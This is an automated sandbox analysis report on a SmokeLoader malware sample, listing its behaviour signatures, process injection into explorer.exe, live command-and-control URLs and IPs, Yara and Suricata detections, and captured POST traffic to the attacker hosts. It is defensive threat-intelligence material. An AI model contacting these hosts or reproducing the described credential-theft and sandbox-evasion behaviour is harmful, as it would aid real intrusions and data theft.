Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe

Overview

General Information

Sample name:172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
Analysis ID:1527171
MD5:8e177d78ae583957804b5a933d6a3f1e
SHA1:edb0a9379263c6a0a12dd77df7d2abe373a24722
SHA256:4793c4f1d490d454d761f7947b6451c07fbbc8639013f5c80b3f493e7c6cb6eb
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file has a writeable .text section
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe (PID: 3340 cmdline: "C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe" MD5: 8E177D78AE583957804B5A933D6A3F1E)
    • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2500 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2976 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6984 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • hfetwhc (PID: 3504 cmdline: C:\Users\user\AppData\Roaming\hfetwhc MD5: 8E177D78AE583957804B5A933D6A3F1E)
  • hfetwhc (PID: 1504 cmdline: C:\Users\user\AppData\Roaming\hfetwhc MD5: 8E177D78AE583957804B5A933D6A3F1E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\hfetwhcJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
        00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.0.hfetwhc.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              16.0.hfetwhc.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  16.2.hfetwhc.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\hfetwhc, CommandLine: C:\Users\user\AppData\Roaming\hfetwhc, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hfetwhc, NewProcessName: C:\Users\user\AppData\Roaming\hfetwhc, OriginalFileName: C:\Users\user\AppData\Roaming\hfetwhc, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\hfetwhc, ProcessId: 3504, ProcessName: hfetwhc

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849742198.54.117.24280TCP
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849730194.87.189.8780TCP
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849738194.87.189.8780TCP
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849714194.87.189.8780TCP
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849718198.54.117.24280TCP
                      2024-10-06T21:26:02.042526+020020391031A Network Trojan was detected192.168.2.849747194.87.189.8780TCP
                      2024-10-06T21:27:36.683173+020020391031A Network Trojan was detected192.168.2.849734198.54.117.24280TCP
                      2024-10-06T21:27:37.689520+020020391031A Network Trojan was detected192.168.2.849746194.87.189.8780TCP
                      2024-10-06T21:28:16.092832+020020391031A Network Trojan was detected192.168.2.849748194.87.189.8780TCP
                      2024-10-06T21:28:56.074082+020020391031A Network Trojan was detected192.168.2.849749194.87.189.8780TCP
                      2024-10-06T21:29:11.964748+020020391031A Network Trojan was detected192.168.2.849750194.87.189.8780TCP
                      2024-10-06T21:29:30.230373+020020391031A Network Trojan was detected192.168.2.849751194.87.189.8780TCP
                      2024-10-06T21:29:49.168031+020020391031A Network Trojan was detected192.168.2.849752194.87.189.8780TCP
                      2024-10-06T21:30:06.043036+020020391031A Network Trojan was detected192.168.2.849753194.87.189.8780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-06T21:27:37.879552+020028298482Potentially Bad Traffic194.87.189.8780192.168.2.849746TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeAvira: detected
                      Found malware configuration
                      Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\hfetwhcReversingLabs: Detection: 47%
                      Multi AV Scanner detection for submitted file
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeReversingLabs: Detection: 47%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,7_2_007E3098
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,7_2_007E3717
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E3E04 RtlCompareMemory,CryptUnprotectData,7_2_007E3E04
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,7_2_007E11E1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E1198 CryptBinaryToStringA,CryptBinaryToStringA,7_2_007E1198
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,7_2_007E123B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E1FCE CryptUnprotectData,RtlMoveMemory,7_2_007E1FCE
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0322178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,9_2_0322178C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0322118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,9_2_0322118D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_03002404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,11_2_03002404
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0300245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,11_2_0300245E
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0300263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,11_2_0300263E
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C1221 CryptBinaryToStringA,CryptBinaryToStringA,13_2_030C1221
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txtJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txtJump to behavior
                      Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletProxy.pdb source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdb source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 0000000D.00000003.2700964728.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: xy.pdbGCT.r source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdb source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,7_2_007E2B15
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,7_2_007E1D4A
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,7_2_007E3ED9
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A330A8 FindFirstFileW,FindNextFileW,FindClose,8_2_00A330A8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,9_2_032215BE
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,9_2_032213FE
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,9_2_032214D8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C2240 FindFirstFileW,FindNextFileW,FindClose,13_2_030C2240
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C18E0 lstrcatW,lstrcatW,PathCombineW,lstrcatW,PathRemoveFileSpecW,FindFirstFileExW,lstrcmpiW,PathCombineW,PathCombineW,FindNextFileW,FindClose,13_2_030C18E0
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C20C1 FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,13_2_030C20C1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C1A96 GetTempPathW,GetTempFileNameW,DeleteFileW,PathRemoveExtensionW,StrRChrW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,StrStrIW,SHGetFolderPathW,PathFindFileNameW,PathAppendW,ExpandEnvironmentStringsW,13_2_030C1A96
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 198.54.117.242:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 198.54.117.242:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 194.87.189.87:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 198.54.117.242:80
                      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 194.87.189.87:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://quantumqube.org/index.php
                      Source: Malware configuration extractorURLs: https://quantumqube.org/index.php
                      Source: Malware configuration extractorURLs: http://innovixus.org/index.php
                      Source: Malware configuration extractorURLs: https://innovixus.org/index.php
                      Source: Joe Sandbox ViewIP Address: 198.54.117.242 198.54.117.242
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                      Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 194.87.189.87:80 -> 192.168.2.8:49746
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upgyyhdoyghspm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smuegklsriebfq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: innovixus.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drfkgcucoqvlrnnc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thbqljycmivxnpmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: innovixus.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdycpqjqlugnms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crwqlqtuysbj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: innovixus.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlijxlatgdyt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quantumqube.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quantumqube.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 6348785Host: quantumqube.org
